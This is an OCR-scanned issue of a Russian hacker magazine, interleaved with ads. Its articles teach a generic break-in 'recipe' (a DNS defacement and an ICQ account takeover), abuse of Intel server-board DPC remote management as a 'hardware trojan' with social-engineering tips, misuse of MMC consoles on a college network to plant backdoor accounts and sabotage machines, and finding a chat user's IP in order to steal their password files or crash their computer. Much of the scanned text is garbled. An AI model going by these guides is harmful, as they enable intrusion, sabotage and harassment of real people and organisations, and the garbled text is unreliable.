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= Здорово, маза хакер! Сегодня мы отдыхаем, и ломать бошку в попытках поломать 
пальцовый сервант как-то ломает :). Будем просто развлекаться! Злобно так, мерзко. 
Изя Хак, если он реально Изя Хак, должен уметь хотя бы подсадить трояна, вырастить 
шестизначный юин и выкинуть кого-нибудь с IRC. 


ИЗиИ ШЕЛЛ ДВУМЯ ПАЛЬЦАМИ 


У тебя сегодня праздник. Твой папашка, или кто-то там еще, свалил в ванную 
(выносить мусор, поесть на кухню, нужное подчеркнуть) и оставил тебе подарок... 
залогиненную консоль. Да не просто залогиненную, а под пользователем root. 


КЛАВА В OFHE \ Горячие клавиши на каждый день 


Представь, ты сидишь за компом. Правая рука лениво таскает мышь из стороны в 
сторону, чтобы в сотый раз открыть какую-нибудь менюшку, запустить прогу или еще 
что-нибудь. А где твоя левая рука во время работы? 


МЕНЯ ЗОВУТ ГОЛЛИВУД \ Часть 1 - Кастинг 


Здравствуй, дорогой кинолюбитель. Хотя нет, ведь если следовать, допустим, 
автомобильной тематике, то автолюбитель - это человек, который имеет свою тачку и 
умеет ее водить, а профессионал - еще и получает за это деньги. Из всего 
вышеперечисленного делаю вывод, что в плане создания кино - ты профан. 
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Процессор - Intel® Pentium® д 2.8 rry 
Материнская плата - Intel® 0845СВ 
Память - 512MB DDR 
Жесткий диск - 120GB 
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компьютеры Apek Universa i po процессоров ее Pentium® 4 


Компьютеры Apek Universal Ha базе процессоров Intel® Pentium® 4, 
созданные с использованием современнейших технологий позволяют по- 
новому взглянуть на окружающий мир. Последние технологии обработки 
видео, звука и графики позволяют использовать новый Арек Universal как 
универсальное средство для создания профессиональных и домашних 
музыкальных студий, фотостудий, станций видео-монтажа и многого другого. 


Удивительные возможности Арек Universal на базе процессоров Intel® 
Pentium® 4 помогут полностью раскрыть Ваш творческий потенциал. 
Используя средства коммуникаций нового Арек Universal Вы получаете 
возможность живого общения со всем миром не выходя из дома в сети 
Интернет. Арек Universal можно использовать как средство обучения и 
развлечения, так как его возможности отвечают требованиям самых 
различных приложений. 
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НАСКОПЬНО Я ПОМНЮ. 9 HAC В СПЕШЕ ЕШЕ НИКОГДА НЕ ВЫЙО 
ЯННИНТИЧЕСКЫЯ CTATEH. HAM ПРОСТО НЕ НРАВИТСЯ КОРЕНЬ ЭТОГО 
СПОВН - =АНЯЛНТ- :2. ЯНАЯЛПИТ. AWA... НУ. В ОБЩЕМ. ТЫ МЕНЯ 
NOHAN ;2. СЕЙЧАС Я ПОПЫТАЮСЬ COENATS HAZ СОБОЙ УСИЙНЕ И 
ПРЕДПОЖИТЬ ТВОЕМУ ВНИМАНЫЮ ПЕРВУЮ В СПЕЦЕ ЯНАЙПИТИЧЕСКУЮ 
СТЯТЬЮ. ПОПРОБУЕТ РАЗОБРАТЬСЯ. ЧТО ЭТО 3A ЭВЕРЬ TAROH - 
ПЕГНЫН НАК - Н ЧЕМ ОН ОТИНЧИЕТСЯ ОТ ТЯЖЕЙПОГО. 


Но сначала придется разобраться с самим 
понятием «хак». Понятие это очень широ- 
кое, поэтому разбираться с ним можно бес- 
конечно. Давай условимся, что «хак» или 
«взлом» — это определенный набор дейст- 
вий, которые выполняет хакер, в результате 
чего нарушается безопасность и/или рабо- 
тоспособность компьютерной системы. 
Под компьютерной системой можно пони- 
мать все, что угодно: и внутреннюю сеть ка- 
кой-нибудь конторы, и отдельно взятый 
почтовый ящик, и О№5-сервер, и UIN аськи. 


Теперь посмотрим, что это за «определен- 
ный набор действий». Это процесс, кото- 
рый как и любой другой процесс имеет 
свои ключевые моменты. Они следующие: 
1. Выбор цели; 

2. Изучение цели; 

3. Анализ результатов изучения; 

4. Определение уязвимости (уязвимос- 
тей); 

5. Выбор инструмента (инструментов), 
необходимых для эксплуатации обна- 
руженной уязвимости; 

6. Эксплуатация уязвимости (уязвимос- 
тей); 

7. Получение информации о положитель- 
ном результате взлома. 


Это рецепт, приятель. И он работает! При- 
веду два примера: 

Пример 1: взлом 10П5-сервера. 

1. Выбор цели: Сосед попросил хакера из- 
менить таблицу имен DNS-cepBepa компа- 
нии, откуда его уволили. 

2. Изучение цели: хакер просканил DNS- 
сервер сканером. 

3. Анализ результатов изучения: после 
сканирования оказалось, что DNS-cepBep 
также является почтовым сервером. 

4. Определение уязвимости (уязвимос- 
тей): версия sendmail сервера оказалась 
уязвима к удаленному эксплоитингу. 


5. Выбор инструмента (инструментов), не- 
обходимых для эксплуатации обнаружен- 
ной уязвимости: хакер зашел на багтрак и 
скачал оттуда один из подходящих к этой 
уязвимостей эксплоитов. 

6. Эксплуатация уязвимости (уязвимос- 
тей): хакер скомпилировал эксплоит, на- 
травили его на сервак, зашел телнетом и 
изменил таблицу О№5-имен. 

7. Получение информации о положитель- 
ном результате взлома: хакер и сосед 
вместе запустили браузер и проверили, 
действительно ли домен компании теперь 
ведет не на сайт компании, а на www. fuck- 
you.com. 


Пример 2: ysog UIN'a. 

1. Выбор цели: хакер выбрал красивый 
шестизначный юин. 

2. Изучение цели: посмотрел в инфо. 

3. Анализ результатов изучения: обнару- 
жил там  прописанное мыло на 
hotmail.com. 

4. Определение уязвимости (уязвимос- 
тей): проверил на hotmail.com и оказа- 
лось, что такое мыло не зарегистрирова- 
но. 

5. Выбор инструмента (инструментов), не- 
обходимых для эксплуатации обнаружен- 
ной уязвимости: залез браузером на hot- 
mail.com и зарегал там мыло. 

6. Эксплуатация уязвимости (уязвимос- 
тей): зашел на сайт icq.com и попросил 
прислать ему «забытый» пароль на мыло. 
7. Получение информации о положитель- 
ном результате взлома: открыл почтовик 
и получил письмо от системы напомина- 
ния паролей icq. 


Это два совершенно разных примера, но 
оба они идеально подходят под наш ре- 
цепт. Я привел эти примеры, чтобы дока- 
зать универсальность этого рецепта. Не бу- 
ду ручаться за все 100%, но мне кажется, 


что 97% всех взломом подходят под этот 
рецепт. По сути, что мы делаем, когда взла- 
мываем что-либо по этому рецепту — мы бе- 
рем цель и _примеряем_ к ней различные 
уязвимости (все, какие мы знаем и какие на 
наш взгляд применимы к данной цели). Это 
не легкий взлом. Практика показывает, что 
намного выгоднее, легче делать все наобо- 
рот: брать уязвимость и _примерять_ ее к 
различным целям. Сразу отвечу, почему это 
легче: целей много, а уязвимостей мало 
(тем более известных какому-то конкрет- 
ному хакеру). Чтоб ты почувствовал разни- 


цу, приведу два примера: 


Пример 1: примеряем уязвимости к кон- 
кретной цели. 

Заказчик говорит хакеру — взломай этот 
сервак. Хакер начинает применять к сер- 
веру все уязвимости, которые ему извест- 
ны: нет ли открытых портов с бажными 
сервисами, нет ли в системе дефолтовых 
паролей, нет ли паролей, которые можно 
подобрать, нет ли открытых расшаренных 
ресурсов. 


Пример 1: примеряем конкретную уцяз- 
вимость к разным целям. 

Чувак запускает легион, стравливает ему 
всю подсетку провайдера и сидит себе, в 
потолок поплевывает в ожидании, когда 
же на очередном компе найдутся откры- 
тые шары. 


Согласись, что первый пример во много 
раз гиморнее (хотя и пользы от него, ко- 
нечно, больше, но мы сейчас не об этом). 
Вот и, пожалуй все. Надеюсь, что дал тебе 
пищи для размышления и объяснил, что 
такое легкий взлом ;). До встречи на стра- 
ницах твоего любимого журнала! 
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ЖЕПЕЗНЫЧЦ 
TPOSHCHULU 


- Хэй, перцы и морковки, я ваша новая училка по географии. 
Ща мы врубимся, как прикинуть презерватив на глобус. 


используем встроенные 
возможности серверных плат 
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Привет, старик, с наступающим тебя. .. Знаешь, иногда так хочется помеч- 
тать о красивом. Например, вот сидишь ты в новогоднюю ночь на тропи- 
ческом пляже, а две обнаженные узкоглазые красотки, весело смеясь, 
массируют твой... Нет, это для другого журнала... Лучше так: небрежно 
захлопнув дверь «Ягуара», ты отдал ключи подбежавшему шоферу, попра- 
вил галстук, улыбнулся своему отражению в дымчатом лобовом стекле и 
неторопливо зашагал к ярко освещенному входу в казино, навстречу му- 
зыке и смеху... нет, это точно не про нас... вспомнил, вот... в половине 
девятого вечера инженеры собрались в серверной и выпили в за уходя- 
щий год, пролив внутрь сервера стакан с водкой. От сервера тут же про- 
тивно запахло, и сайт фирмы лег, не успев даже мяукнуть. Все тут же по- 
желали тебе успехов в наступающем Новом году и разбежались по домам, 
а ты, тяжело матерясь, достал отвертку и принялся раскручивать корпус, 
надеясь только на чудо... Мда, это совсем про грустное... А, вот, сидишь, 
значит, ты на рабочем месте, оттягиваешься пивком перед Новым годом, 
все равно настроение уже не рабочее, и тихо млеешь, глядя, как админ за- 
пускает один антивирус за другим, пытаясь понять, от чего его новый сер- 
вер вдруг стал перегружаться каждый час ровно в 3 минуты 33 секунды... 
А все ведь очень просто, внутри сервера стоит железный троянский конь. 


ЖЕЛЕЗО ДЛЯ СЕРВЕРА 


Хорошее серверное железо, старик, сильно отличается от того, что стоиту 
тебя дома и на рабочем месте. Мамка может легко стоить тонну грин и вы- 
ше, а корпус - от полтонны и вверх. Но, как ты понимаешь, дело не в цене, 
дело в качестве и возможностях. На разработку такой платы уходит го- 
раздо больше сил и времени, чем на обычную мамку. И все глюки стара- 
ются отловить заранее, во время тестов. И набивают в эту плату кучу раз- 
ных дополнительных примочек и функций. Ну и продают такие платы и 
корпуса гораздо торжественнее и с огромным уважением к клиенту. 

Серверные мамки делают очень немногие фирмы. Это что-то типа «золо- 
того клуба» тех, кто вообще умеет делать материнские платы. И все име- 
на членов этого клуба тебе, старик, хорошо знакомы. Выше всех стоят 
Compaq и Hewlett Packard, они для своих серверов дизайнят все до по- 


Серверные мамки делают очень немногие 
фирмы. Это что-то типа «золотого клуба» 
тех, кто вообще умеет делать 
материнские платы. 
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Вопросы есть? 
- А что такое глобус? 
- Вот с этого мы и начнем... 


следнего винтика и продают их только со своей лейбой и за очень несла- 
бые деньги. Следом за ними идет любимая фирма Интел... Да, старик, 
фирма Интел выпускает не только процессоры и чипсеты, она еще умеет 
делать (и делает) отличные серверные мамки и специальные серверные 
корпуса. Ты меня спросишь: «А почему я никогда не видел сервера мар- 
ки Интел?». Грамотный вопрос, старик... Дело в том, что Интел выпуска- 
ет много разных деталей, из которых можно собрать сервер, но не выпу- 
скает серверов. Интересно, правда? За него это делают сборщики, кото- 
рые покупаюту него этот конструктор, скручивают серверы и приклеива- 
ют свою этикетку. Ага, говоришь ты, значит все серверы производства 
«российской науки и оборонки»?.. Правильно, старик, все это мамки и 
корпуса Интел, скрученные российскими руками с помощью китайской 
отвертки. 

Еще раз - серверные мамки выпускают не только эти три (то есть два, по- 
сле объединения Hewlett и Compaq) гиганта, есть и другие (Supermicro, 
Asus, Gigabyte и прочие), но качество и набор функций у этих других то- 
же совсем другие... Особенно функции, которыми мы как раз и интересу- 
емся. 


ИНТЕЛ ИНСАЙД 


Нас с тобой, старик, будут сильно интересовать мамки Интел. Почему, 
спросишьты. А потому, что вероятность встретиться с такой мамкой очень 
высока, они стоят почти в каждой фирме, где бюджет не позволяет поку- 
пать сильно дорогое железо. То есть Hewlett это для банков и нефтяников, 
а Интел это для среднего класса. В чем разница? Просто в ширине расста- 
новки пальцев. Мое личное мнение - сервера на мамках Интел гораздо 
лучше в работе хотя бы потому, что проблем при установке правильных 
операционных систем (Пингвин и Фря) с ними заметно меньше и народ- 
ная поддержка в Интернете лучше. 

В общем, ограничимся Интелом и посмотрим, что может нам предложить 
для взлома эта замечательная фирма. Функций на мамке масса, глаза раз- 
бегаются: и температурные датчики, и измерители скорости вращения 
вентиляторов, и датчики вскрытия корпуса, и доступ к серийным номерам 
компонентов... Такой широты нам с тобой в одной статье ни за что не ох- 
ватить, поэтому попробуем сузить поиск: функции управления материн- 
ской платой делятся на две очень разные категории: на те, что не зависят 
от операционки (встроены в материнскую плату), и на специальный фир- 
менный софт, который ставится при конфигурировании машины. Чувст- 
вуешь разницу? Чтобы добраться до софта, надо, как минимум, чтобы ад- 
мин установил этот софт на сервер, что не факт (очень многие этого не 
делают, кстати). А вот встроенные функции платы - они всегда с тобой (в 
смысле - сней). 


ИНТЕЛ АУТСАЙД, 


Ну, я чувствую, тебе уже не терпится в бой... Похвально, но сначала надо 
определить, что за мамка перед тобой, наборы функций в них сильно от- 
личаются. Раскрутить сервер тебе вряд ли дадут, попробуем обойтись без 
этого. Для начала можно порыться в куче мусора, которую админ называ- 
ет документацией, возможно в ней отыщется красивая брошюрка с лого- 
типом Интел и названием модели серверной мамки. Это - легкий вариант. 
Если так получилось, то сразу же ищи там же фирменный компакт-диск, 
который был в комплекте с платой, пригодится позже. Брошюрку верни, 
чтобы не выглядеть слишком умным, а диск заныкай. 

Если так определить модель не удалось, попробуем другой вариант. По- 
пробуй оказаться возле экрана сервера во время перезагрузки (подсказ- 
ка: случайно нажми на ресет и тут же скажи: «ОЙ, что это с сервером?»). 
Смотреть надо в верхний левый угол экрана и запоминать серийный но- 
мер BIOS, который там появляется в начале загрузки. Скорее всего он бу- 


дет выглядеть примерно так: SKA40.86B.0011.P05. Надо запомнить его 
начало, то есть значки, стоящие слева от .86B. (я написал SKA4O, у тебя 
скорее всего будут другие). Зная их, ты сможешь определить тип интере- 
сующей тебя материнской платы через страницу 
http://support.intel.com/support/motherboards/bios.htm на сайте под- 
держки Intel. Оцени, кстати, длину списка, сколько Интел выпускает pa3- 
ных серверных MaMOK... 


ДОБЫВАЕМ КОНСОЛЬ 


В общем-то, если твой админ догадался поставить на сервер софт для уп- 
равления мамкой, то уже можно начинать развлекаться, надо только ска- 
чать правильную развлекалку. Здесь тебе пригодится умная таблица на 
страничке http://www.intel.com/support/motherboards/server/isc/soft- 
ware.htm, где ты найдешь правильную консоль для своей платы. Имей в 
виду, все эти управлялки весят очень немало, и при загрузке их по Инету 
с сайта Интел надо быть осторожным, а то кое у кого может возникнуть 
вопрос - а зачем этому парню понадобился такой большой файл (некото- 
рые версии управлялки занимают больше 50 мегов)? 

Собственно, про то, как залезать в сервер при помощи стоящего на нем 
софта, я рассказывать не собираюсь - на свете полным-полно троянов, 
руткитов, и рассказ про использование фирменного софта будет слегка 
неуместен. Это примерно как нортоновский pcAnywhere в качестве троя- 
на использовать. С интеловским софтом для управления сервером разби- 
райся сам, короче... А пароль скорее всего на этот доступ админ не по- 
ставил. (Это я так хитро отвертелся от длинного рассказа, старик. Потому 
что при установке на интеловский сервер фирменного интеловского соф- 
та полные возможности по хаку этого сервера заметно больше, чем эта 
статья. Раз эдак в двадцать.) 


ЖЕЛЕЗНЫЙ ТРОЯН 


Но, предположим, твой админ ничем не отличается от широких масс адми- 
нов, умную книжку про мамку не открывал и полезный софт на сервер не 
ставил. В таком случае тебе пригодится табличка, в ней приведены моде- 
ли серверных мамок, у которых часть функций управления платой встро- 
ена прямо в саму плату и не зависит от операционной системы. Будем на- 
деяться, что облюбованная тобой система в этом списке есть. 


Стоп... Не зависит от операционной системы? Да! Это и есть железный, 
ничем не удаляемый троян, которого не увидит ни один антивирус и кото- 
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Вот с этими платами можно поиграться... 


рый будет работать всегда - и под Виндами, и под Пингвином, и даже под 
полуосью. На серверных мамках производства Интел это чудо называется 
DPC (Direct Platform Control). Лезь в меню маздая, ищи там интеловскую 
управлялку, это должно выглядеть примерно как на рисунке, и ищи там 
запуск DPC Console. 


РОЗНИЧНАЯ ПРОДАЖА: 


ЖЕЛЕЗНЫЙ ТРОЯНСКИЙ КОНЬ 
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В меню ищем запуск DPC Console 


ВЫКЛЮЧАТЕЛЬ И ВКЛЮЧАТЕЛЬ 


Теперь давай внимательно посмотрим на запустившееся окно. Две KHO- 
почки С телефончиками - это связь и разъединение связи с сервером, тут 
все просто и понятно. Кстати, сетевой адрес сервера настраивается имен- 


Здесь настраивается 1Р-адрес сервера 


но через эти кнопки. Настраиваешь сетевой адрес сервера, давишь на 
«Connect», и ты уже в Хопре... 


Следом идут твои любимые кнопки «Включить», «Выключить» и «Ресет» 
(помнишь «семь бед - один ресет»). На них особенно интересно понажи- 
мать, когда все собрались идти домой, а ты не успел доиграть в любимую 
игрушку. Понажимаешь эдак, глядишь - кто-нибудь и останется с тобой за 
компанию, и не так скучно будет. 


Ленинский пр-т, 89/2, тел.: 132-7100, 132-5195, 132-1888 
Овчинниковская наб., д. 22/24, тел.: 951-06-56, 959-4809 
Измайловская площадь, д. 8, тел. 166-20-63 

Тихорецкий б-р, 1, ТК «МОСКВА», пав. 2710-2112, тел. 359-8088 


пр-т Буденного, 53, ВКЦ «Буденовский», пав. А, тел. 788-1521 
Пятницкое ш-се, влЛ4, Митинский радиорынок, пов. 3, тел. 720-0031 
ВКЦ «Савеловский», пав. B45, тел. 784-6619 

Измайловский б-р, 60/10, тел. 465-5592 

ОПТОВАЯ ПРОДАЖА: (095) 234 47 24 


www.taisu.ru 
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в продаже с 3 декабря 


Из декабрьского номера 
журнала «Свой бизнес» 
вы узнаете: 


Представители банков, государства 
и предприниматели обсуждают за 
круглым столом перспективы 
финансирования малого бизнеса. 


Чем аукнутся для небольших фирм 
новые правила, установленные 
московскими властями. 


Рассказывают специалисты 
компании "Кодак". 


Сколько можно на них заработать. 


Выгодно ли заниматься 
ветеринарным бизнесом. 


Честные способы снизить платежи с 
фонда зарплаты 


Трудно ли стать партнером 
зарубежной компании и что для этого 
нужно. 


История появления всемирно 
известной марки. 


ОТРАБОТЫ ПО НАЙМУ \\..) К ФИНАНСОВОЙ НЕЗАВИСИМОСТИ 


ЖУРНАЛ ДЛЯ ПРЕДПРИНИМАТЕЛЕЙ CWWW.MYBEL AU) 
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Кстати, а зачем, как ты полагаешь, здесь кнопка 
«Включить»? То есть не очень понятно, как 
включать холодный сервер по сети, не подходя 
к нему, правда? Вот, вот, интересно очень... 
Кнопка эта здесь не от того, что кто-то решил, 
что раз есть выключатель, то должен быть и 
включатель. Хех, старик, ты будешь смеяться, но 
эта кнопка действительно может включать сер- 
вер. Все дело в том, что некоторые функции 
серверной мамки продолжают работать и тогда, 
когда сервер выключен. Для них достаточно, 
чтобы шнур питания был воткнут в розетку и на 
плате стояла батарейка. Одна из таких функций, 
существующая на всех мамках, даже на простых, 
- это часы и BIOS. А интеловская плата, помимо 
этого, пишет во флешку логи датчиков, ведет ре- 
естр установленных на плате компонентов и 
слушает окружающий мир через встроенный се- 
тевой адаптер. Вот через этот адаптер и можно 
скомандовать серверу «Подъем!». По сети. 


Дальше идут четыре кнопки, с помощью которых 
про сервер можно узнать много интересного. 
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Кнопка SEL вызывает System Event Log - это 
журнал системных событий, который хранится 
во флешке и содержит краткую историю серве- 
ра с момента изготовления. Можешь узнать 
много интересного и ненароком спросить адми- 
на, что случилось с вентилятором, который он 
поменял полгода назад и зачем он так часто пе- 
регружает сервер, например... 


Кнопка FRU - замечательная. Она вызывает 
хранящийся во флешке список фирменных ин- 
теловских компонентов, установленных на пла- 
те, с их серийными номерами. Ты только пред- 
ставь себе, ты не лазил внутрь сервера и зна- 
ешь заводские номера всех стоящих внутри де- 
талек... Можно написать админу письмо от 
фирмы-производителя о том, что в связи с тем, 
что процессоры с серийными номерами с тако- 
го-то по такой-то были изготовлены с наруше- 
ниями технологии, то фирма извиняется, про- 
сит владельцев дефектных процессоров прине- 
сти их для обмена на исправные и получения 
подарка от фирмы (наручные часы с эмбле- 
мой)... Мда... А если то же написать про мате- 
ринскую плату, вот будет интересно: он ее сра- 


Некоторые функции серверной мамки 
продолжают работать и тогда, когда 
сервер выключен. Достаточно, чтобы 
шнур питания был воткнут в розетку. 


ЖЕЛЕЗНЫЙ ТРОЯНСКИЙ КОНЬ 


Консоль прямого управления платой (DPC) 


зу вытащит из сервера или сначала на фирму позвонит?.. Ну, ладно, 
дальше поехали. 

Кнопка SDR открывает консоль, через которую можно посмотреть исто- 
рию и текущее состояние множества датчиков, стоящих на плате. Можно 
посмотреть температуру в разных частях мамки и некоторые другие пара- 
метры. 

Кнопка RSA не очень интересна, так как это просто другой вид на область 
флешки, где хранятся данные FRU и SDR. 

Кнопка с диском и молнией - это очень опасный инструмент, она перегру- 
жает сервер, да так, что неподготовленный зритель побежит звонить во 
все мыслимые и немыслимые службы поддержки, потому что сервер бу- 
дет грузить специальные утилиты обслуживания, а не установленную на 
нем ось. 

Ну вот, вроде все про кнопки, в разных версиях ОРС (помни про табличку) 
наборы кнопок могут немного отличаться, но основные будут на месте. 


КАК ОТКРЫТЬ ЛАЗЕЙКУ 


Теперь о том, как сделать так, чтобы сервер тебя пустил внутрь по сети. 
Поверь мне, на Интеле не лохи работают, по умолчанию все эти функции 
выключены для Инета (но включены для локалки!), и единственный ло- 
пух, на которого ты можешь всерьез рассчитывать, это твой системный ад- 
министратор... Если у тебя есть в руках фирменный CD для этой мамки, 
проблем вообще нет - загрузи сервер с него и запускай из меню System 
Setup Utility (551). Если компакта нет, то можно попробовать загрузить- 
ся с системной дискеты (это вполне может быть обычная загрузочная 
дискета с DOS) и запустить Server SSU с нее руками (утилита есть в набо- 
ре, который ты сгрузил с веба). В меню SSU выбираешь конфигурирова- 
ние доступа по локальной сети. Переставь уровень доступа «LAN Access 
Mode» на «Always available», чтобы можно было по сети делать с сервером 
все, что угодно, и напиши в «Host IP address» какой-нибудь подходящий 
IP-agpec. (Он, кстати, вовсе не обязан совпадать с адресом сервера в опе- 
рационке, достаточно выбрать его в той же подсети, чтобы не думать про 
маршрутизацию; например, вполне можешь написать 192.168.10.250, ес- 
ли адрес работающего сервера 192.168.10.2) 


ПРОТИВ ЛОМА... 


Ты хочешь знать, кто подпустит тебя так близко к серверу? Не мой вопрос, 
старик, это другой хак, социальный. Предложи подмести и вымыть пол в 
серверной, подежурь на выходных, дождись, пока все пойдут обедать, 
фантазируй, и все получится... Есть ли защита от железного трояна? Ко- 
нечно, есть: не пускать никого в серверную, ставить пароль на переза- 
грузку машины и на доступ к ней по сети. Одним словом, если админ про- 
чтет доки, ты ничего не сделаешь. Вот только читает их один из сотни, по- 
моему. Ну да, и ты помни - я тебе ничего не советовал, просто рассказал 
про замечательные возможности серверов Интел. Удачи :). 
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ШСАОЗОРТ 
MANAGEMENT 
CONSOLE 


легальный 


корпоративный троян 


Андрей «Дронич» Михайлюк (dro 


h@real.xakep. ru) 


Локация: некий московский институт (назовем его, к примеру, 
эстрадно-сатирическим), одна из компьютерных 
аудиторий. 


Участники: студенты второго курса, которым наскучили 
гадкие предметы «Мировая эстрада» и «Теория 
сатирь», 


Жертвы: локальная сеть института, а также ее админы 
(студенты пятого курса, в голове которых - только 
предстоящий диплом). 


IT STARTS 


Началось все вполне безобидно. Забивающие Ha предмет студенты ла- 
зали по Инету, лениво отмахивались от преподов, в общем, организо- 
вывали настоящий рай в отдельно взятой аудитории. И все было бы 
пинцетно, если бы не... не бухгалтерия, внезапно посчитавшая трафик 
и пришедшая к выводу, что количество Инета на душу населения надо 
резко уменьшать :(. Итог: на половине предметов Инет пропал, и делать 
стало откровенно нечего. А скучающий компьютерщик - это не к добру 


Облазив все шары, наигравшись во все стандартные игрушки и послав 
всех, кого только можно net send’om, студенты стали превращаться в 
сонных мух. Попытки заняться мелким хаком ни к чему не приводили - 
какой там хак из-под винтукея с запрещенным запуском пришлых эк- 
зешников. .. Но тут кто-то (очевидцы утверждают, что это был некто Ки- 
рион) додумался набрать в командной строке три заветных буквы - ММС. 


ТЕОРИЯ САТИРЫ 


Фактически ММС представляет собой оболочку для запуска консолей. 
Придумана она была для облегчения работы сисадмина: все настройки 
системы сосредоточены практически в одном месте, так гораздо проще 
конфигурить рабочие места для юзеров. Основная фишка консолек - в 
их нечеткой вложенности. То есть консоль «диспетчер устройств» может 
быть вызвана из свойств компьютера, из другой консоли (например, из 
«управления компьютером»), а может быть стартанута абсолютно авто- 
номно. При этом никто не мешает админу настроить собственную персо- 
нализированную консоль, в которой он скомбинирует уже существую- 
щие так, как удобно именно ему. А раз ММС - административная тулза, 
без удаленного доступа к юзеру в ней не обошлось :). 


КОНСОЛЬ КОНСОЛЕЙ 


Более всего нас должна заинтересовать консоль «Управление компью- 
тером». Во-первых, в нее вложены практически все остальные консоли, 
а во-вторых - в меню «действие» присутствует незамысловатая пункти- 
на «Подключиться к другому компьютеру». Надо сказать, что и студенты 
злополучного МЭСИ почему-то безоговорочно полюбили эту консоль. И 
вот почему. 


ЗЕ eet ee ee ee ee ee 
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Подсоединившись к ЛЮБОМУ компьютеру локальной сети, мы получаем 
эксклюзивное право на запуск консолей с правами сидящего за компом 
юзера. А уж чего-чего, а вложенных консолей у нас имеется предоста- 
точно. Поглядим, что мы можем учудить с соседом (или промежуточным 
сервером локалки). 


ГАДОСТЬ ПЕРВАЯ: ШАРИМ ПО ШАРАМ 


Удержаться от соблазна расшарить абсолютно любую папку на чужом 
компе просто невозможно. Находим что-нибудь интересненькое, скры- 
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то шарим (чтобы хозяин не увидел разоблачающей ручки под значком) 
и пользуемся после безо всяких дополнительных средств. 


ГАДОСТЬ ВТОРАЯ: БЭКДОРИМСЯ 


Нам предоставлена возможность создать на компе пользователя с лю- 
быми правами. Ну что нам стоит запретить админу доступ к реестру и 
разрешить его гостю? Да ничего не стоит! А лучше завести себе юзера с 
неприметным именем и входить на комп через него (это в случае ло- 
кального хака). 


ГАДОСТЬ ТРЕТЬЯ: КРУТИМ ДИСКИ 


Взгляни на скрин, и ты оценишь всю мощь ММС. Форматируем, удаляем, 
дефрагментируем, играем крышечкой сидюка - и все через одну малень- 
кую консольку. 


MICROSOFT MANAGEMENT CONSOLE 


ГАДОСТЬ ЧЕТВЕРТАЯ: СЛУЖИМ ОТЕЧЕСТВУ 
Нехилый списочек служб справа - это ВСЕ службы, запущенные на ком- 
пе. Изгаляться можно, как хочешь, но лучше изгаляться с пользой. Да- 
вешние студенты, например, массово отключали О№5-службу на компах 
аудитории и имели нехилую прибавку в скорости Инета (а все осталь- 
ные материли админов за то, что «Инет упал»). 


jig! НИИ Нун id 


ГАДОСТЬ ПЯТАЯ, САМАЯ ПРИКОЛЬНАЯ: 
СИСТЕМНЫЕ СВОЙСТВА 


Этот хацкерский рай вызывается нажатием правой кнопки на значке 
компа и выбором в выпавшем от удивления меню пункта «Свойства». 
Наши возможности резко расширяются до изменения параметров быст- 
родействия (можно устроить 486-ой из четвертого пня), изменения па- 
раметров загрузки и контроля за перезагрузкой компа (особенно с 
включенной опцией «можно потерять данные» :)). 


ЗАПАДЛО 


Доступ к ММС может быть ограничен, но это не должно тебя останавли- 
вать! Во-первых, консоли можно запускать автономно, а не из оболочки 
консоли, этим легко обходится запрет на запуск ттс.ехе (достаточно 
добраться до C:\WINNT\system32\compmgmt.msc, и все станет пинцет- 
но). Во-вторых, админы могут запретить пункт «Выполнить» из пуска, а 
заодно и доступ к папке WINNT (это самое страшное западло). Но и тут 
все просто - обычно никто не геморроится с удалением системной пап- 
ки «Администрирование», ее просто запихивают поглубже - и все. Так 
что нам достаточно найти ее через стандартный виндовый поиск и запу- 
стить ярлычок к нужной консоли. 
И, наконец, в-третьих - некоторые 
консоли могут быть ограничены в 
правах. То есть либо они работают 
локально, но не работают удален- 
но, либо не работают вообще ни- 
как :(. Но и тут нашлось решение - 
используй для запуска консоли 
DebPloit (см. статью о нем в этом 
же номере), и она будет работать 
как часы. 


Конечно, админы могут запретить 
вообще ВСЕ, но... тогда работать 
на компах будет невозможно, а 
администрация институтов и клу- 
бов заинтересована как раз таки 
в обратном. Поэтому пока адми- 
нистраторы идут на компромисс с 
администрацией :), защита сис- 
тем будет напоминать Тришкин 
кафтан (был такой чувак по име- 
ни Тришка, который отрезал у 
кафтана рукава, чтобы удлинить 
полы, а потом отрезал полы, что- 
бы сделать рукава; лох, короче, 
полный!). А что еще нам нужно 
для полного счастья? 
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ОСТАТЬСЯ 
B KUBBIH... 
В CETU 


повесть о TOM, как наказать 


чувака в сети 


Скажи, у тебя были случаи, когда какой-то чудак на букву 
«м» ПОСТОЯННО ДОСтавал тебя в чате или по аське? Скорее 
всего, да. Но тогда ты был еще ламером и не читал наш 
журнал, а значит не знал, что от таких личностей нужно 
избавляться. Сегодня пришло время рассказать тебе об 
Этом. 


Скрыпников Сергей aka Slam (sergey@soobcha.org) 


LET’S GO 


Итак, для того, чтобы начинать издеваться над чуваком в сети, перво-на- 
перво ты должен позаботиться о своей личной безопасности. OT всего, ес- 
тественно, ты уберечься не сможешь (как и никто другой на этой плане- 
те), но существенно затруднить жизнь хацкеру можешь. Для этого следу- 
ет поставить файрволл на свою систему. Сейчас я тебе не буду говорить, 
что лучше, а что хуже, т.к. уже все сказано (читай Спец-Х №11(24)). 


ИССЛЕДУЕМ МЕСТНОСТЬ 


Теперь, когда ты уже немного обезопасил себя от вторжения, ты должен 
узнать 1Р-адрес того человека, что тебе не нравится \ который до тебя до- 
капывается \ докапывается до твоей девушки\собаки\хомячка. Для этого 
есть несколько способов. 

В ICQ это делается просто: 

1) ставим патч - ICQ 2002а Beta Build #3722 
(http://debugger.by.ru/razno/icq2002a_ip.zip). 

2) IP можно узнать, посмотрев все соединения при помощи netstat.exe 
(очень удобно это делать в окне файрволла Outpost Pro). 

3) На сайте http://www.leader.ru есть такая фишка: UIN Locator. Т.е. до- 
статочно зайти на сайт, ввести UIN твоего недруга, и ТР у тебя в кармане. 


В ТВС тоже нет ничего сложного: «/dns nickname» - результатом будет IP 
человека, который сидит в Ирке под ником nickname. 


НАЧАЛО ДЕЙСТВИЙ 


«Ну знаю я АЙПишник его, и что дальше?» - скажешь ты, прочитав все ска- 
занное. А дальше - карты тебе в руки, способов очень много. Начнем с са- 
мого простого. Качаем самый обыкновенный сканер портов (X-Spider 
очень функционален в этом смысле) и с помощью него ищем «расшарен- 
ные ресурсы» на чужом компе. Если таковые есть, то залезаем на компью- 
тер и делаем все, что хотим (можешь, например, удалить какие-нибудь 
файлики или скачать *.pwl себе на комп, а потом расшифровать). 

Ты можешь воспользоваться так называемыми нюками. Это такие про- 
граммы, которые посылают на компьютер неправильные ТСМР-пакеты, ко- 
торые не может правильно обработать твоя операционка, вследствие че- 
